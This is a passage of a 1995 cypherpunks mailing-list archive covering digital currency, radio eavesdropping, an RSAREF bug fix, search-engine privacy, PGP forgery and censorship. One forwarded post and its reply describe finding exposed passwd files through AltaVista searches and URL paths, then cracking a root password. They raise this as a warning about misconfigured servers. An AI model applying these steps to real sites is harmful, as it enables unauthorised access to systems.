but I am not saying this will happen without a struggle. I believe this
will be the ultimate conclusion after a lot of turbulence and perhaps
even bloodshed.

--

today we think that cash moves around the world very readily, in the blink
of an eye. but I suggest that today we actually have tremendous amounts
of "friction" that are dissipating economic value of "currencies" merely
as it moves through the system (the stock market would be one example).
looking only at today's *cash* systems, indeed there is low friction, but
when considers that *stocks* are actually cash, then our overall economic
system is quite backward. cyberspace will act as a sort of 
economic lubricant of the highest degree in decreasing this friction.

I will debate intelligent opposition to these ideas in this essay, but
frankly I think what I describe is a reality that is going to emerge 
completely independent of my own promotion or anyone else's opposition.
the famous Gilmore quote is that "cyberspace sees censorship as a defect
and routes around it" has an analogy in the economic realm: 
"cash sees the middlemen as a defect and routes around him". inflation is
one example of instability or lack of resiliency (a defect) of a currency. 
it can be seen as the exact opposite effect the growth of a stock is: loss 
of economic capital due to dissipation.

I imagine one of the main claims against my essay will be as I anticipated
above: only governments have the force and power necessary to back a 
currency. but I believe this is an anti-libertarian view. it suggests
that cash only works when the government is involved, and the force
associated with that government is employed as a means of keeping the
system in check. can one have an economic system not based on mandatory
obeisance to a government? I think it is clear to most on this list
such a thing is not only possible but advantageous, desireable, and 
preferrable.

the "trust" that a person places in a company stock is absolutely no
different, in essence, from that placed in a currency of a government--
only the scale and the participants are different. I don't really believe
that the legal framework associated with a government is what holds 
commerce together. there are many situations where companies simply
eat their losses even when they are in the "right" legally and could
sue and win.

cyberspace will tend to prefer "anticipation" to legalities. in other
words, it will tend to prefer to develop systems that anticipate failure
(such as currency crashes) before they happen. courts will be seen as the 
absolute last resort for any kind of arbitration. in my view this has 
already happened today. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 28 Dec 1995 04:14:19 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE
Message-ID: <199512270332.TAA01269@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 PM 12/26/95 -0800, sameer wrote:
> The Apache-SSL Commerce webserver is the only commercial encrypting
> webserver with source available. Ian Goldberg, graduate student at
> U.C. Berkeley, well-known for his work on SSL security, commented on
> the importance of available source,

Thanks for the great work.

This protects the web against GAK far more effectively than any
political campaign ever could.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Wed, 27 Dec 1995 23:07:25 +0800
To: cypherpunks@toad.com
Subject: MD5 for DOS/Windows
Message-ID: <Pine.3.89.9512262006.A24030-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anybody have a DOS or Windows implementation of MD5 available?
Thanks.

--
PJ Ponder






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: floyddb@alpha.c2.org
Date: Thu, 28 Dec 1995 06:02:25 +0800
To: cypherpunks@toad.com
Subject: 900 MHz phones
Message-ID: <199512270428.UAA04497@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


It seems like the hornets nest has been stirred.  

I was merely trying to point out a possible consumer grade hole in
some of the FH phones currently on the market.  If the Interceptor or Scout can
be used to listen to a FH phone, then surely it is being done.

I used to work with a guy who would program his scanner to all of his
neighbors cordless phone frequencies, then he would call them to
verify his programming.  A six-pack on a Saturday night and the scanner would
be more entertaining than the bug light.  

Personally, my concern is with my next door neighbor listening to me talk to my
girlfriend, not the NSA.  If I want to arrange delivery of PGP to the Russians 
of where I should pick up my next 50 kg of cocaine, I'm *not* going to use my
home phone.  Because of these concerns, I refuse to own a cordless phone.  So    
if the 900 MHz phones are resistant to these consumer grade attacks, they might
be worth the money, otherwise the neighbors will just upgrade.

        Floyd D. Barber
        floyddb@alpha.c2.org
        Key fingerprint:
        8A 98 1F 6B 70 7A FE 24 
        35 D4 48 CF 9D F6 B0 91





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 29 Dec 1995 19:17:14 +0800
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: FH radios
In-Reply-To: <199512262025.OAA09759@cdale1.midwest.net>
Message-ID: <199512270252.VAA00427@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> I agree; but, if the information you are passing is truly that important
> just use a landline phone.  Eliminate the possable "leak".
> I'm not claiming that a landline phone is secure, but your cordless is
> connected to it, so no matter how good your security is on the phone its no
> longer secure once it leaves the base station and enters the landline.

Argh....
Phones are ANYTHING but secure. Hence the STUIII & PGPphone.

An encrypted rf link is far better than any POTS....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 28 Dec 1995 07:05:46 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: a new idea: stocks == currency
Message-ID: <199512270801.AAA11701@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 18:22 12/26/95 -0800, Vladimir Z. Nuri wrote:
>...An I believe that future company
>stock will be considered a kind of currency issued by the company. when
>you are buying and selling stocks, what you are really doing is buying
>and selling currencies backed by different corporate entities. 

Here are some differences between stocks and currencies.  I don't know how
they effect your arguments, but I do invite comment:


                                Stocks                  Curriences

(1) Voting                      Most stock              Based on residency
                                inplies voting          not net worth

(2) Reputation availability     Many stocks,            Few curriencies,        
                                reputations hard to     reputations well known
                                find

(3) Legal backing               Based on government     same

(4) Dividends                   Commonly payed          never heard of it


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Dec 1995 00:53:23 +0800
To: Adam Shostack <tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512270801.AAA11744@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:53 12/25/95 -0500, Adam Shostack wrote:
>        The basic problem is that (personal) spam is a social, not a
>technical problem.  If someone wants to annoy you via the internet,
>they can do so.  You can raise the cost of their annoying you, but you
>need to be careful not to make it difficult to talk to you.

It seems to me that one of the technical problems of the personal spam is
the way it can grow into a denial of service attack on your system.  If it
takes you more horsepower to filter the spam than it takes to generate it,
then you are particulary vunerable.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 28 Dec 1995 04:50:08 +0800
To: tallpaul@pipeline.com (tallpaul)
Subject: Re: Only accepting e-mail from known parties
Message-ID: <v02140a08ad060f437c51@[165.254.158.232]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:23 12/26/95, tallpaul wrote:

>I hadn't picked up the problem you mentioned. Thanks for pointing it out.
>

You're welcome - You _did_ ask for comments/analysis <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Thu, 28 Dec 1995 10:01:04 +0800
To: stig@hackvan.com (Stig)
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery]  [Vaughan Pratt]
In-Reply-To: <m0tUjjD-0006F1C@hackvan.com>
Message-ID: <9512270551.AA23874@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> This is all wishful thinking.  A 26-MHz wide channel such as 902-928MHz
> has a channel capacity of 2*26 Mbs or 6.5 megabytes/sec.  So if someone

	That is not what Mr Shannon says,  Shannon's law relates date
rate, bandwidth and signal to noise ratio - the "channel capacity" of 26
mhz of spectrum is determined by the signal to noise ratio in the 26 mhz
channel and ranges from much less than 26 mbs to several times that rate
depending on the signal to noise ratio (and of course how clever the
modulation technology is at exploiting it).  Witness a 28.8 kb modem
which stuffs 28.8 kb into less than 3.2 khz given about 32 db gross SNR.

	But more significant to the predection recording technique you
are talking about is how many samples a second it takes to reproduce
information in the 26 mhz bandwidth.   Crudely, as a rule of thumb
the Nyquist criterion would suggest that you need to sample at twice
the highest frequency (or 26 mhz if you downtranslate to DC).  This
means 52 megasamples per second.

	Now depending on how much junk there is in the 902-928 mhz band
at the location of interest and how far below the other signals the
signal of interest is, you might be able to get away with 8 bit samples
(providing about 35 db dynamic range) but would probably need more bits
than that for things to work reliably.  Say 12 bits (72 Mbytes sec) or
16 bits (104 Mbytes/sec),  Yes, perhaps compression could buy you back
some of that, but you are still realisticlly talking about recording
somewhere between maybe 20 and 100 Mbytes/sec.

	The low end of this range is about the upper limit of present
day high performance disk system bandwidth.  So you are not talking
about a simple configuration with off the shelf disks and controllers
(unless you run several in parallel).    And one minute of audio gobbles
up way more than a gigabyte, or less than  2 minutes per $K of disk
cost.  And that assumes some compression.


> can tell *that* you are transmitting somewhere within that channel then
> they simply record *everything* at that data rate in the entire
> channel, your transmission and everyone else's, for the necessary
> time.  A $600 3.5Gb Sequel drive can record a ten-minute transmission;
> then the eavesdropper can use one Pentium or two dozen, budget
> permitting, to extract your message from that data.  If all you are
> doing is frequency hopping or spread spectrum, reconstruction is a very
> undemanding algorithmic task, and one Pentium should be able to
> reconstruct your signal the same day, two dozen the same hour.
> 

	I will agree that such techniques can be used, and am well aware
that they have been used for the last 25 or so years by the NSA and
other like organizations for handling this kind of problem (originally
in the HF radio spectrum for finding and reading covert burst
transmissions - at least so I have heard).


> >But to get back to the original point of this thread - while
> >such techniques are possible (as is full hard encryption), it is my
> >understanding that actual conusmer 900 mhz digital cordless phones
> >that use frequency hopping use a very limited set of frequencies
> >and a small set of fixed hopping patterns and don't hop very fast. 
> 
> Hopping speed is almost completely irrelevant to the computational
> complexity of this problem.
> 
	I agree in general, though the degenerate case of very slow
hopping permits of some simplifications and speedups since demodulating
bits between hops can be done with less computation per sample than
estimating where the next hop frequency is when it is unknown.  And a
phone that slowly hops in a fixed simple pattern onto a small number of
channels can be demodulated by very simple approaches indeed, including
much less sophisticated and costly ones than fast DSP of wideband
sampled channels.

> 
> You can never overestimate the cost of decryption.  What looks
> expensive enough today to decrypt can plummet by orders of magnitude on
> alarmingly short notice.  We used to think TCP was mildly secure until
> easily installed sniffers became freely available on the internet that
> would reconstruct a telnet connection and print out the first 100
> characters, making it child's play to extract passwords.
> 
	I must say that I was not amoung those who ever thought that TCP
was secure, perhaps because I have spent too much time looking at packet
dumps from protocol analyzers and bus traffic  on logic analyzers. And
even the oldest and slowest systems could reconstruct TCP - it was not a
leap of system technology at all, but a leap of hacker application
skills and awareness.  I hate to even whisper the other places in the
fragile web of our infrastructure that are vulnerable to intelligent
attack ... there are many unexploited holes left even as we plug some of
the obvious ones.   The good thing is that people are begining to think
about them.


> If you think that you are secure because the effort of an attack seems
> on the high side, bear in mind that the tasks in a systematic attack can
> by definition of "systematic" be programmed, greatly easing the
> attacker's task.  And once programmed, the program can be distributed to
> all and sundry on the internet.
> 
	That I agree with and think the current rash of sophisticated
hacker tools in the hands of relatively unsophisticated kids who could
in no way have created them  proves your point well.

> If a given level of cryptographic strength seems adequate for a message,
> add several orders of magnitude and maybe you'll be lucky.  
> 
	I wouldn't consider hopping or spread spectrum cryptography.  
Historically they have been viewed as techniques for avoiding jamming
and interference and sometimes also for making signals harder to find
rather than as information security techniques.  Their use in cordless
phones is primarily to aviod interference from other users of the
902-928 band and not for security.


> I know of only two really satisfactory places to hide information worth
> hiding: combinatorial search space (read: real encryption such as DES
> or RSA, with a hefty key),

	I think we all agree that security by obscurity is not real
security at all.  But even the security of mathematical crypto is mostly
unproven as of yet - we merely think things are difficult to compute
because we don't know an easy way to do it, not because there is a clear
proof that is true.

							Dave Emery






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 28 Dec 1995 05:56:52 +0800
To: cypherpunks@toad.com
Subject: Bidzos on C-span
Message-ID: <8NaRgD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I was very impressed by Bidzos's talk to C-Span. I'm sorry I didn't tape it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 28 Dec 1995 12:32:14 +0800
To: sameer <sameer@c2.org>
Subject: Re: fun with rsaref and 64-bit machines
In-Reply-To: <199512270120.RAA19559@infinity.c2.org>
Message-ID: <30E12C02.54F7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
>         Does anyone know if RSAREF works on 64 bit CPUs? It seems
> that RSAREF's NN_Mod is getting stuck in digit.c at:
> 
> 99         */
> 100       while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {
> 101         if ((t[0] -= c) > (MAX_NN_DIGIT - c))
> 102           t[1]--;
> 103         aLow++;
> 104       }

  In global.h, UINT4 is typedef'd to be unsigned long int, which is a 64 bit
value on the DEC alpha system.  The type UINT4 is supposed to be a 32-bit
value.  On the DEC system you need to make that be an unsigned int, which is
32-bits.  I've complained to RSA before about this problem, as it bit me
when I was porting SSLREF to the DEC machine.  They mumbled something about
people using the pre-compiled libraries, and ignored me.  It would be
so easy for them to just ifdef this one line...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 04:17:42 +0800
To: cypherpunks@toad.com
Subject: DejaNews and Alta Vista Search Tools, and Privacy Implications
Message-ID: <ad065486000210045fdd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(Side note: I seem to have returned from my holiday away from this area and
away from computers to a war zone, with multiple flames and threats of
legal action. Being a part of the Cypherpunks group, and potentially part
of the "criminal conspiracy" to defame, am I included in the lawsuits? I
wonder.)

Anyway, a point of clarification of a point, lest there be the belief that
_all_ Cypherpunks are opposed to comprehensive Web search tools:


At 8:46 PM 12/23/95, Steven L. Baur wrote:

>Furthermore, no one has mentioned the positive changes made to
                                       ^^^^^^^^?
>Dejanews since it got bashed thoroughly on this list a few weeks ago.
>They've significantly turned down the amount of old information
>indexed, and have restricted the groups (and mailing lists) they
>archive.

I for one don't consider this to be a positive development. Reducing the
time horizon for searches has no real effect on the compilation of dossiers
(for example), but certainly makes DejaNews less useful. (And I'd be
willing to bet that the time horizon was scrunched down for space and time
reasons, not for reasons of privacy; the horizon will likely _increase_ as
users ask for, and perhaps are willing to pay a bit for, longer time
horizons.)

And I don't believe the dominant thinking of folks who commented was that
DejaNews was worthy of "bashing." In fact, I found it all very interesting,
and a confirmation of what many of us expected would soon happen, i.e.,
fast access to past comments.

I think I and several others commented on the major implications for
privacy, especially vis-a-vis the way corporations will be able to see
compilations of postings to "outrageous" groups. Indeed, I know of some
people hiring programmers who are already using such tools to get a better
understanding of whom they may be hiring, or not. But my comments were not
in the vein of "something has to be done," but of recognition that a Brave
New World is fast unfolding.

Thinking that one is "safe" because a particular search service is not
including all the groups or mailing lists it _could_ include is illusory
(one is reminded of ostriches....). The same thinking happened several
years ago when a great hue and cry in the media caused Lotus to abandon
plans to sell a CD-ROM to individuals with publically available census and
other data on it about neighborhoods, phone numbers, etc. Inasmuch as the
non-individual entities (corporations, mass mailers, courts, law
enforcement, etc.) already have full access to such databases, all the hue
and cry really accomplished was to give individuals a false sense of
security and privacy. A triumph of feelgood style over substance.

Real privacy and security comes from steps taken to make the information
private in the first place, not to ex post facto limit access.

(I am not claiming that Steven Bauer or anyone else on our list is calling
for laws to limit Web search engines, just giving my views about this. As a
matter of fact, however, I am hearing rumblings in other places that "there
ought to be a law" about these archives, indexes/indices, etc. Same old
story. Kind of hard to enforce such laws when the indexes are in Holland,
or Byelorussia, or "somewhere in cyberspace." )

Face it, every single word written by any of us to any Usenet newsgroup,
going back to the beginning of Usenet, and expanding out to many
ostensibly-private mailing lists, will fairly soon be searchable. (Add some
digital cash and proxy/remailer features, and someone will be incentivized
to put some really big arrays of optical disks up for searching. And if the
U.S. tries to "regulate" such searches....well, I'm preaching to the choir
here....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 29 Dec 1995 04:16:40 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <199512251953.OAA01614@homeport.org>
Message-ID: <qJoRgD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the underlying problem is that the way PGP signatures are used by most
people, they validate a text, but allow it to be quoted out of context in an
e-mail or Usenet forgery. E.g., suppose Alice posts a PGP-signed text in
alt.sex. Bob forges a Usenet article in misc.kids, making it look like it came
from Alice and quoting her PGP-signed body. Alice will have a tough time
convincing the public that she didn't post it -- after all, her signature
verifies. (There are many people on the net who don't comprehend the
argument that the Path: is clearly bogus). Or: Bob writes Alice a sexually
explicit letter and forgets to say "Dear Alice" in the signed block. Alice
forges an e-mail to Carol, making it look like it came from Bob and quoting
the signed block. Bob would have to realy on the analysis of Received:
headers to repudiate such a forgery.

I suggest to the kind folks working on PGP 3 that there should be a standard
protocol to include within the signed portion the information on when and for
whom this text is written: i.e. the list of e-mail recipients and/or Usenet
newsgroups, which could be easily compared with the RFC 822/1036 headers of
an e-mail/Usenet article. Perhaps there could be a new option for PGP to look
_outside_ the signed block and match the headers with what's inside the
block. E.g., suppose the signature block says: this text was written by
alice@zog.org, posted to alt.sex and alt.sex.banal and e-mailed to
bob@masons.com. Suppose PGP is asked to check the signature in a file that
purports to be a e-mail or a Usenet article and has some headers before the
signed portion. If there is a list of To: recipients, and it includes someone
other than the recipients listed within the signed block; or if there is
a Newsgroups: header, and it includes newsgroups not listed within the signed
portion; then the input is bogus. For compatibility with the existing
software, if the signed block doesn't include this info, then this checking
should't be done, of course.

(Yes, one could do this with a wrapper to PGP, making the whole thing even
more user-hostile.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 29 Dec 1995 05:50:08 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512271205.HAA08576@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 27, 1995 00:50:13, '"Robert A. Rosenberg" <hal9001@panix.com>'
wrote: 
 
 
>At 13:23 12/26/95, tallpaul wrote: 
> 
>>I hadn't picked up the problem you mentioned. Thanks for pointing it out.

>> 
> 
>You're welcome - You _did_ ask for comments/analysis <g>. 
> 
 I wasn't being sarcastic with the "thank you" and I don't usuallly treat
criticism as a neo-flame. 
 
As you may have inferred from other posts of mine, I am more interested and
knowledgable about the social aspects of the privacy/crypto/anon debates
then the code/algo aspects. 
 
I know other peoplw who share my interests but who proceed to write,
publish, comment on the tek issues without understanding them. Getting a
better understanding of them is one of the reaons I'm on the list.
Sometimes I'll venture a view on one of the tek issues, in part to test by
knowledge of those issues from the tek angle. Criticism is first a small
price to pay for the ability to do this. Second, it improves my knowledge
of the tek. 
 
--tallpaul 
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Thu, 28 Dec 1995 14:07:40 +0800
To: mixmaster@remail.ecafe.org (Ecafe Mixmaster Remailer)
Subject: another anonymous poster helping to destroy our rights
In-Reply-To: <199512271335.NAA07018@pangaea.ang.ecafe.org>
Message-ID: <9512271343.AA13409@all.net>
MIME-Version: 1.0
Content-Type: text


We just heard from another anonymous poster trying to destroy our rights
to free speech.  How long will the cypherpunks put up with this?

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 28 Dec 1995 13:05:46 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: fun with rsaref and 64-bit machines
In-Reply-To: <30E12C02.54F7@netscape.com>
Message-ID: <199512271646.IAA23331@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	That fixes it, thanks.

> 
> sameer wrote:
> > 
> >         Does anyone know if RSAREF works on 64 bit CPUs? It seems
> > that RSAREF's NN_Mod is getting stuck in digit.c at:
> > 
> > 99         */
> > 100       while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) {
> > 101         if ((t[0] -= c) > (MAX_NN_DIGIT - c))
> > 102           t[1]--;
> > 103         aLow++;
> > 104       }
> 
>   In global.h, UINT4 is typedef'd to be unsigned long int, which is a 64 bit
> value on the DEC alpha system.  The type UINT4 is supposed to be a 32-bit
> value.  On the DEC system you need to make that be an unsigned int, which is
> 32-bits.  I've complained to RSA before about this problem, as it bit me
> when I was porting SSLREF to the DEC machine.  They mumbled something about
> people using the pre-compiled libraries, and ignored me.  It would be
> so easy for them to just ifdef this one line...
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 28 Dec 1995 12:19:18 +0800
To: cypherpunks@toad.com
Subject: FYI - telecom bill or not there are still censors
Message-ID: <2.2.32.19951227172007.0070f34c@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


This arrived in my mailbox (I have *not* personally confirmed it) ....

According to reports popping up in other places around the Compuserve 
Information Service it appears that they have taken a stance of Internet 
censor and are now blocking access to certain Usenet newsgroups.  This 
move took place just before the Christmas holiday and remains unannounced 
to the membership/subscriber base.  

Just about any Usenet newsgroup with the word "sex" or "erotica" are no 
longer available. Attempts to subscribe to these newsgroups produces an 
error message stating that the newsgroup does not exist.  In reality its 
access has been blocked.

A short list (very short) of other newsgroup feeds that are no longer 
accessible as provided by another party to me include:

alt.homosexual
alt.magick.sex
alt.magick.sex.angst
alt.motss.bisexua-l
alt.politics.sex
alt.recovery.addiction.sexual
alt.recovery.sexual-addiction
alt.religion.sexuality
alt.sex
alt.support.disabled.sexuality
clari.news.crime.sex
clari.news.gays
clari.news.sex
gay-net.coming-out
rec.arts.erotica
shamash.gayjews
soc.support.youth.gay-lesbian-bi

Other newsgroups also remain blocked or eliminated from a provided 
pick-list and if this is allowed to continue the likelihood of this 
spreading to other topics that a select group find offensive or 
intolerable is a very real threat.

A number of these newsgroups are legitimate groups for people needing 
support or recovery or places where frank discussions on adult subjects 
take place.  Some are religious in nature though non-mainstream.  Others 
are associated with the gay lifestyle.  As you can see there is a 
definite trend being set here.

So far much of this change in access remains unknown to the vast majority 
of Compuserve customers who remain away from their terminals for the 
holidays.

If this bothers you I would suggest that you send a message to Compuserve 
customer services at GO FEEDBACK.  Those using autopilot programs send 
e-mail to Feedback at 70006,101.  From outside of Compuserve send e-mail 
to 70006.101@compuserve.com

We are supposedly paying a monthly fee which includes =full= Internet 
service and access.  We are no longer getting it.  That is 
misrepresentation.

Take this issue to your other favorite forums, newsgroups, etc.  If we 
allow freedom of speech and access to be lost now we will never get it 
back.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 28 Dec 1995 10:22:08 +0800
To: ponder@wane-leon-mail.scri.fsu.edu (P.J. Ponder)
Subject: Re: MD5 for DOS/Windows
In-Reply-To: <Pine.3.89.9512262006.A24030-0100000@wane3.scri.fsu.edu>
Message-ID: <199512271437.JAA04030@homeport.org>
MIME-Version: 1.0
Content-Type: text



| Anybody have a DOS or Windows implementation of MD5 available?
| Thanks.

	Anytime I need to find crypto code, I go to the University of
Milan.  ftp.dsi.unimi.it

	The best selection of hash functions, raw ciphers, PGP, and
much other stuff I know of.  Worth a place in your hotlists.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Thu, 28 Dec 1995 14:12:55 +0800
To: cypherpunks@toad.com
Subject: Re: Misconfigured Web Servers
Message-ID: <9511278200.AA820083186@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     Re: the "trick" below... an even more effective search is the 
     following...
     
     http://www.altavista.digital.com/cgi-bin/query?pg=aq&what=web&q=url%3A
     etc%2Fpasswd&r=&d0=&d1=&Submit.x=51&Submit.y=14
     
     which searches all URLs that contain etc/passwd 
     
     See for yourself!
     
     
     David Klur
     
     
_____________________________ Reply Separator _________________________________
Subject: BoS: Misconfigured Web Servers
Author:  nobody@mail.uu.net at Internet-USA
Date:    12/26/95 3:57 PM


     Everyone,
     
     A friend of mine showed me a nasty little "trick" over the weekend. He 
     went to a Web Search server (http://www.altavista.digital.com/) and 
     did a search on the following keywords -
     
             root: 0:0 sync: bin: daemon:
     
     You get the idea. He copied out several encrypted root passwords from 
     passwd files, launched CrackerJack and a 1/2 MB word file and had a 
     root password in under 30 minutes. All without accessing the site's 
     server, just the index on a web search server!
     
     Well, the first thing I did was check my site and it's ok. The second 
     thing I did was check my ISP for my home account, and it's okay. But 
     by trying various combinations of common accounts on web searches, 
     dozens of passwd files were found.
     
     It seems that a large number of locations who use httpd and ftpd on 
     the same server often copy the regular passwd file to ftp/etc or 
     ftp-users/etc for ftp user access. A few sites have left the root 
     password in the file, and many contain user accounts' passwords. The 
     problems I see here are as follows:
     
     1. You can get the passwd file in some cases by simply pointing your 
     URL to http://target.com/ftp/etc/passwd or 
     http://target.com/ftp-users/etc/passwd. Not good. Anon ftp can't get 
     it but a web browser can. Many passwd files are shadowed but you can 
     see some legit account names. Yes, I realize that this may be a dummy 
     file but hey, not always the case.
     
     2. Some sites do not have the passwd file world readable, but the 
     entire passwd file stills exists indexed on the web search server. I 
     don't know about you, but I don't think I'd want my passwd file 
     indexed and searchable on a world accessible web server.
     
     3. A ton of etc/group files turned up as well.
     
     The guy that showed me this found it funny, but I find it disturbing. 
     Are there that many sites that are that poorly configured?
     
     Mark_W_Loveless@smtp.bnr.com
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Fri, 29 Dec 1995 05:50:17 +0800
To: cypherpunks@toad.com
Subject: (fwd) RSA CEO Bidzos on USML/ITAR
Message-ID: <199512271817.KAA16898@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


From: softwa19@us.net (Charles R. Smith)
Newsgroups: talk.politics.crypto
Date: Tue, 26 Dec 1995 16:55:09 GMT

RSA CEO/President D. James Bidzos, in a speech before the
Commonwealth Club of California, openly stated his opposition to
current USML/ITAR controls.  "We stand to lose a significant
part of our industry due to export controls", said Bidzos in the
taped address shown on C-Span 12/25/95.  The recent teaming of
Sun with ex-Soviet programmers to avoid U.S. export controls on
encryption was cited by Bidzos as an example of exactly how jobs
and opportunities are being forced off shore by U.S. policy.
Bidzos statements echo the remarks from Microsoft CEO, Bill
Gates, who also lashed out at federal export restrictions in his
comments before the National Press Club in early Decemeber.

This author noted some months ago the teaming of Ernst & Young
and SOFTWARE (AG), a german based software firm, to provide
encryption security with no import regulations.  Foreign
companies are allowed freely to compete in the U.S. domestic
market while U.S. citizens are restricted from the international
market.  This imbalance costs american jobs, taxes, rapidly
erodes our lead in this important area of science and is unfair.
The regulations, instead of limiting access to foriegn criminals
and terrorists, has led to a U.S. funded explosion of better
off-shore products that are beyond law enforcement control.  In
fact, the Federal government not only encourages this effort but
even has a multi-million dollar contract with SOFTWARE (AG).
The time for these regulations has clearly passed.  Yet, our
government is not geared for quick action, nor will self-seeking
bureaucrats ever be convinced to let go.  The world, however,
will quickly leave us behind unless we act soon.

1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith - President
SOFTWAR, Richmond VA
http://www.ultimate.org/2292/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@SmallWorks.COM (Jim Thompson)
Date: Thu, 28 Dec 1995 12:20:09 +0800
To: dklur@dttus.com
Subject: Re: Cybercash security
